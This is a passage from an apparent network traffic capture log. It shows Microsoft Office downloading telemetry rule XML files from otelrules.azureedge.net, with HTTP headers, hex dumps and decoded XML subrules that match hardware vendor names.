                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140057Z-16547b76f7fkj7j4hC1DFW0a9g0000000ksg00000000630k
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:57 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  110192.168.2.44988413.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:57 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:57 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 408
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                  ETag: "0x8DC582BB9B6040B"
                                                                                                                  x-ms-request-id: 2f2a95d3-901e-00ac-5b08-2cb69e000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140057Z-16547b76f7fr4g8xhC1DFW9cqc0000000k0g000000001e2n
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:57 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  111192.168.2.44988313.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:57 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:57 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 469
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                  ETag: "0x8DC582BB3CAEBB8"
                                                                                                                  x-ms-request-id: da73b1ea-a01e-0070-5573-35573b000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140057Z-16547b76f7fkcrm9hC1DFWxdag0000000kvg000000009fhh
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:57 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  112192.168.2.44988813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:58 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:58 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 416
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                  ETag: "0x8DC582BB5284CCE"
                                                                                                                  x-ms-request-id: 50fcf232-201e-0085-635e-3534e3000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-r178fb8d765z9wvrhC1DFW1a0s00000000r000000000bmk5
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:58 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  113192.168.2.44988913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:58 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:58 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 472
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                  ETag: "0x8DC582B91EAD002"
                                                                                                                  x-ms-request-id: a2911e08-e01e-003c-21a2-34c70b000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-r178fb8d765th6bkhC1DFWr7h000000002s0000000009ea9
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:58 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  114192.168.2.44989013.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:58 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:58 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 432
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                  ETag: "0x8DC582BAABA2A10"
                                                                                                                  x-ms-request-id: 392771d5-701e-000d-1cd2-2c6de3000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-16547b76f7fknvdnhC1DFWxnys0000000kw0000000000qsw
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:58 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  115192.168.2.44989113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:58 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:58 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 475
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                  ETag: "0x8DC582BBA740822"
                                                                                                                  x-ms-request-id: 1138df84-701e-0097-5940-36b8c1000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-1749fc9bdbdlfqrwhC1DFWmyg800000000qg000000006gd6
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:58 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  116192.168.2.44989213.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:58 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:58 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 427
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                  ETag: "0x8DC582BB464F255"
                                                                                                                  x-ms-request-id: f6e8dc5a-601e-0002-3da0-34a786000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-1749fc9bdbddrtrhhC1DFWsq8000000002m000000000ctmp
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:58 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  117192.168.2.44989513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:58 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:59 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 474
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                  ETag: "0x8DC582BA4037B0D"
                                                                                                                  x-ms-request-id: 43524bb3-601e-003e-69d2-2c3248000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140058Z-16547b76f7fr4g8xhC1DFW9cqc0000000k0g000000001e5g
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:59 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  118192.168.2.44989613.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:59 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:59 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                  ETag: "0x8DC582BA6CF78C8"
                                                                                                                  x-ms-request-id: 1ec43ba4-f01e-0003-65d2-2c4453000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-16547b76f7f9bs6dhC1DFWt3rg0000000kpg00000000d4wc
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  119192.168.2.44989713.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:59 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:59 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 472
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                  ETag: "0x8DC582B984BF177"
                                                                                                                  x-ms-request-id: 9ec2e68b-201e-0096-6cd2-2cace6000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-16547b76f7f8dwtrhC1DFWd1zn0000000kug00000000bk59
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
